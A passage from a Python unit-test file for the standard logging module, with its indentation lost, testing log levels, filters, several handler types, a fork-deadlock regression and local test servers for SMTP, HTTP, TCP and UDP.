self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self._quit = True
support.join_thread(self._thread, timeout)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
support.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
